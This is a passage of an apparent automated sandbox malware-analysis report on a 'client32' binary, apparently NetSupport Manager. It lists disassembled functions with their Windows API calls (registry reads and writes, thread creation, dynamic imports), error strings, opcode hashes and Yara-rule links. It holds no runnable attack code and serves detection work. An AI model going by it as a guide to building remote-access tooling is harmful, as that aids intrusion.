Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00020019,?,00000000,B6DE5DE1,00000000,00020019,?,00000000), ref: 110ED600

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

(, xrefs: 110ED5F9
Error %d getting %s, xrefs: 110ED614

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValuewvsprintf
String ID: ($Error %d getting %s
API String ID: 141982866-3697087921
Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1

Function 110EDA50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57registryCOMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 110EDA72

Part of subcall function 11165319: _xtoa@16.LIBCMT ref: 11165339

RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,74DF2EE0,?,00000000,?,?,?,?,?,?,110FFCD8), ref: 110EDA97

Strings

Error %d setting %s to %s, xrefs: 110EDAA9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Value__itow_xtoa@16
String ID: Error %d setting %s to %s
API String ID: 293635345-505477165
Opcode ID: 5399d0c878ca9376637174e36f3ff42c87abf73c74d5c93a578a92cbacd700c2
Instruction ID: 6f959109a0be5d8d9dc8ac9870de87e4aa858457916a5eb01474972dd4e2a1dd
Opcode Fuzzy Hash: 5399d0c878ca9376637174e36f3ff42c87abf73c74d5c93a578a92cbacd700c2
Instruction Fuzzy Hash: 3F01C076A00208ABD714CAA99C85FEEB7BCDB49708F104199F905AB240DAA1AE04C7A0

Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

Error. NULL capbuf, xrefs: 1100B6A1
Error. preventing capbuf overflow, xrefs: 1100B6C6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: Error. NULL capbuf$Error. preventing capbuf overflow
API String ID: 0-3856134272
Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6

Function 1112D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735

Strings

WTSSendMessageA, xrefs: 1112D6EE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: WTSSendMessageA
API String ID: 199729137-1676301106
Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0

Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,00000000), ref: 110D1572

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

pszBuffer[1024]==0, xrefs: 110D158A
..\CTL32\NSMString.cpp, xrefs: 110D1585

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5

Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11015049
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94

Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,00000000), ref: 110D15EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

pszBuffer[1024]==0, xrefs: 110D1603
..\CTL32\NSMString.cpp, xrefs: 110D15FE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9

Function 1109D810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
SetLastError.KERNEL32(00000078,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D84D

Strings

ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D81E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
API String ID: 199729137-262600717
Opcode ID: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
Instruction ID: a7eb98fa6670c8ef5a6ef58352877086b50851194238c89ec414a48c6dd1b06f
Opcode Fuzzy Hash: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
Instruction Fuzzy Hash: 2EF05E72A41228AFD724CF94E944A97B7E8EB48710F00491AF95A97640C670E810CBA0

Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetPropA.USER32(?,?,?), ref: 1115F395

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

p->m_hWnd, xrefs: 1115F372
..\ctl32\wndclass.cpp, xrefs: 1115F350, 1115F36D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessPropwsprintf
String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
API String ID: 1134434899-3115850912
Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2

Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151F9
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5

Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
SetLastError.KERNEL32(00000078), ref: 11017409

Strings

QueueUserWorkItem, xrefs: 110173DE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0

Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE

Strings

*TapiFixPeriod, xrefs: 110297A7
Bridge, xrefs: 110297AC

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateThread__wcstoi64
String ID: *TapiFixPeriod$Bridge
API String ID: 1152747075-2058455932
Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
